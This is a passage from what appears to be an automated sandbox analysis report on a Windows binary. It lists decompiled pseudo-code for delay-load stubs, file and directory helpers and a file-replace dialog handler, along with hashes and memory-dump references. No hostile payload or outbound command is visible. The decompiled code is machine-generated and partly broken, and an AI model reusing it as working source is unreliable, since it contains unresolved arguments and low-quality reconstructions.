                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 7972f7c140b144e8ada99af2a7657cbe866c262ac8c992764a880292c3375516
                                                                                                                • Instruction ID: d191dedba1843b05b113fc2c32c9a70358f024f21473d9c169ca67e847b8bd38
                                                                                                                • Opcode Fuzzy Hash: 7972f7c140b144e8ada99af2a7657cbe866c262ac8c992764a880292c3375516
                                                                                                                • Instruction Fuzzy Hash: B9B012A2268105BD310412127E02C76010CC6C1F10330E03FF500F914294801F461032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2CEC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2CEC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6f4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc5
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 7d33d22f2884267baae112d53718fbfa00cf7c1b1560fc98e5021a0eb38f1ee4
                                                                                                                • Instruction ID: d8917ef8d6eb9800226344bf2ac5276cf50020e2ab41490b571c39997a17a4df
                                                                                                                • Opcode Fuzzy Hash: 7d33d22f2884267baae112d53718fbfa00cf7c1b1560fc98e5021a0eb38f1ee4
                                                                                                                • Instruction Fuzzy Hash: 79A011822A8203BC30282222AE02C3A020CC0E0F20338A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D43, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2D43() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef714); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2d26
                                                                                                                0x00ed2d2b
                                                                                                                0x00ed2d32

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2D2B
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 75db054533a55807a791fe671212cb62a992b3be329a839127d894e3a134bcc3
                                                                                                                • Instruction ID: 9a3e2ba1d6036fa0cf03a5343f599e5e9ffc836b0471e449312f471c8dfeab23
                                                                                                                • Opcode Fuzzy Hash: 75db054533a55807a791fe671212cb62a992b3be329a839127d894e3a134bcc3
                                                                                                                • Instruction Fuzzy Hash: E4A011822A820ABC300822222E02CBA020CC8C0F20330A82FF202A8280A8800E8A0032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D57, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2D57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef714); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2d26
                                                                                                                0x00ed2d2b
                                                                                                                0x00ed2d32

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2D2B
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: f7e38a9614cf5fc70fc8740e08a92f8f8715b3bee819ffb1e26097fe9200891a
                                                                                                                • Instruction ID: 9a3e2ba1d6036fa0cf03a5343f599e5e9ffc836b0471e449312f471c8dfeab23
                                                                                                                • Opcode Fuzzy Hash: f7e38a9614cf5fc70fc8740e08a92f8f8715b3bee819ffb1e26097fe9200891a
                                                                                                                • Instruction Fuzzy Hash: E4A011822A820ABC300822222E02CBA020CC8C0F20330A82FF202A8280A8800E8A0032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D39, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2D39() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef714); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2d26
                                                                                                                0x00ed2d2b
                                                                                                                0x00ed2d32

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2D2B
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: a9ba06fe0732dcc3a178f10a203b6466649b64244bf9ded5041159bcb5e75ed8
                                                                                                                • Instruction ID: 9a3e2ba1d6036fa0cf03a5343f599e5e9ffc836b0471e449312f471c8dfeab23
                                                                                                                • Opcode Fuzzy Hash: a9ba06fe0732dcc3a178f10a203b6466649b64244bf9ded5041159bcb5e75ed8
                                                                                                                • Instruction Fuzzy Hash: E4A011822A820ABC300822222E02CBA020CC8C0F20330A82FF202A8280A8800E8A0032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D0A, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2D0A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6f4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc5
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 1a20a25f315244ba577ab0835e31dbdf4f186f0956b2780b597604e8591b542b
                                                                                                                • Instruction ID: d8917ef8d6eb9800226344bf2ac5276cf50020e2ab41490b571c39997a17a4df
                                                                                                                • Opcode Fuzzy Hash: 1a20a25f315244ba577ab0835e31dbdf4f186f0956b2780b597604e8591b542b
                                                                                                                • Instruction Fuzzy Hash: 79A011822A8203BC30282222AE02C3A020CC0E0F20338A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D00, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2D00() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6f4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc5
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 36b8559489b0e5acbb2e218c2dc15849056cc4a052b421f8ec02ca751436aa65
                                                                                                                • Instruction ID: d8917ef8d6eb9800226344bf2ac5276cf50020e2ab41490b571c39997a17a4df
                                                                                                                • Opcode Fuzzy Hash: 36b8559489b0e5acbb2e218c2dc15849056cc4a052b421f8ec02ca751436aa65
                                                                                                                • Instruction Fuzzy Hash: 79A011822A8203BC30282222AE02C3A020CC0E0F20338A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D14, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2D14() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6f4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2cc5
                                                                                                                0x00ed2cca
                                                                                                                0x00ed2cd1

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2CCA
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 26fa7155b5624bff002c7e3396f1fcb9cfee68a8256fffece66d2679099da9dc
                                                                                                                • Instruction ID: d8917ef8d6eb9800226344bf2ac5276cf50020e2ab41490b571c39997a17a4df
                                                                                                                • Opcode Fuzzy Hash: 26fa7155b5624bff002c7e3396f1fcb9cfee68a8256fffece66d2679099da9dc
                                                                                                                • Instruction Fuzzy Hash: 79A011822A8203BC30282222AE02C3A020CC0E0F20338A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC22BF, Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetEndOfFile.KERNELBASE(?,00EC9627), ref: 00EC22C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File
                                                                                                                • String ID:
                                                                                                                • API String ID: 749574446-0
                                                                                                                • Opcode ID: 85d35365aebf6a645bf5bef7aa673d2d1c223fb5bcf8f6edbebcb8424aaca031
                                                                                                                • Instruction ID: 6da4bef1837d1747733d3b825efdea811ab847a6d73848eca849aedda8254de0
                                                                                                                • Opcode Fuzzy Hash: 85d35365aebf6a645bf5bef7aa673d2d1c223fb5bcf8f6edbebcb8424aaca031
                                                                                                                • Instruction Fuzzy Hash: 77B012314A40895A8F002B30DC044103911E71130630041707042C9061CB12C0065600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF6A0, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ECF6A0(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




                                                                                                                0x00ecf6a4
                                                                                                                0x00ecf6ac
                                                                                                                0x00ecf6b0

                                                                                                                APIs
                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,00ECF841,C:\Users\user\Desktop,00000000,00F0DA6A,00000006), ref: 00ECF6A4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory
                                                                                                                • String ID:
                                                                                                                • API String ID: 1611563598-0
                                                                                                                • Opcode ID: 70d280468954f9fe2d4d3b220b3d382c9bb84e7ec28fd0ee0e8d6094e5f20805
                                                                                                                • Instruction ID: adcb257de9b5bd06ec08d65dc03ee83ca09ac17280d5f16f965c8b2bf32e564c
                                                                                                                • Opcode Fuzzy Hash: 70d280468954f9fe2d4d3b220b3d382c9bb84e7ec28fd0ee0e8d6094e5f20805
                                                                                                                • Instruction Fuzzy Hash: 22A0123029800A4A8F000F30CD0981575509760B02F00C6217147C40A0CB304414E500
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 00ED0BA0, Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E00ED0BA0(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E00ED3370();
				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E00EC11DA(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E00EC674F( &_a2640, _a6752, 0x800);
						E00EC37A4( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0xf26054( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00EC37E6( &_a900, 0x200, L"%s %s %s", E00EC4A3C(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E00ECF8F6(0 + _a344, _a340,  &_a212, 0x32);
								_push(E00EC4A3C(0 + _a344, 0x98));
								_t151 = 0x200;
								E00EC37E6( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0xf0ca64; // 0x0
							E00EC702C(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00EC37E6( &_a896, _t151, L"%s %s %s", E00EC4A3C(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0xf222fc;
							_t158 =  *0xf222f8;
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E00ECF8F6(_t158, _t154,  &_a212, 0x32);
								_push(E00EC4A3C(_t154, 0x98));
								E00EC37E6( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xf260bc(_t137);
						}
						 *0xf2609c(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}





























                                                                                                                0x00ed0ba0
                                                                                                                0x00ed0ba0
                                                                                                                0x00ed0ba5
                                                                                                                0x00ed0bab
                                                                                                                0x00ed0bb4
                                                                                                                0x00ed0bbe
                                                                                                                0x00ed0bdd
                                                                                                                0x00ed0be7
                                                                                                                0x00ed0bed
                                                                                                                0x00ed0c67
                                                                                                                0x00ed0c82
                                                                                                                0x00ed0c91
                                                                                                                0x00ed0ca1
                                                                                                                0x00ed0cc2
                                                                                                                0x00ed0cd8
                                                                                                                0x00ed0cf4
                                                                                                                0x00ed0cf9
                                                                                                                0x00ed0d0c
                                                                                                                0x00ed0d1c
                                                                                                                0x00ed0d22
                                                                                                                0x00ed0d28
                                                                                                                0x00ed0d29
                                                                                                                0x00ed0d2e
                                                                                                                0x00ed0d31
                                                                                                                0x00ed0d38
                                                                                                                0x00ed0d54
                                                                                                                0x00ed0d5e
                                                                                                                0x00ed0d66
                                                                                                                0x00ed0d84
                                                                                                                0x00ed0d89
                                                                                                                0x00ed0d97
                                                                                                                0x00ed0d9e
                                                                                                                0x00ed0dac
                                                                                                                0x00ed0e12
                                                                                                                0x00ed0dae
                                                                                                                0x00ed0dc8
                                                                                                                0x00ed0dcc
                                                                                                                0x00ed0ddb
                                                                                                                0x00ed0de3
                                                                                                                0x00ed0df7
                                                                                                                0x00ed0dfc
                                                                                                                0x00ed0e0a
                                                                                                                0x00ed0e0a
                                                                                                                0x00ed0e27
                                                                                                                0x00ed0e2d
                                                                                                                0x00ed0e38
                                                                                                                0x00ed0e47
                                                                                                                0x00ed0e57
                                                                                                                0x00ed0e71
                                                                                                                0x00ed0e89
                                                                                                                0x00ed0e93
                                                                                                                0x00ed0e9b
                                                                                                                0x00ed0eb5
                                                                                                                0x00ed0eba
                                                                                                                0x00ed0ec8
                                                                                                                0x00ed0ed6
                                                                                                                0x00ed0edc
                                                                                                                0x00ed0ee2
                                                                                                                0x00ed0ef6
                                                                                                                0x00ed0f05
                                                                                                                0x00ed0f1c
                                                                                                                0x00ed0f21
                                                                                                                0x00ed0f2f
                                                                                                                0x00ed0f2f
                                                                                                                0x00ed0ee2
                                                                                                                0x00ed0f35
                                                                                                                0x00ed0f35
                                                                                                                0x00ed0f37
                                                                                                                0x00ed0f41
                                                                                                                0x00ed0f41
                                                                                                                0x00ed0bf2
                                                                                                                0x00000000
                                                                                                                0x00000000
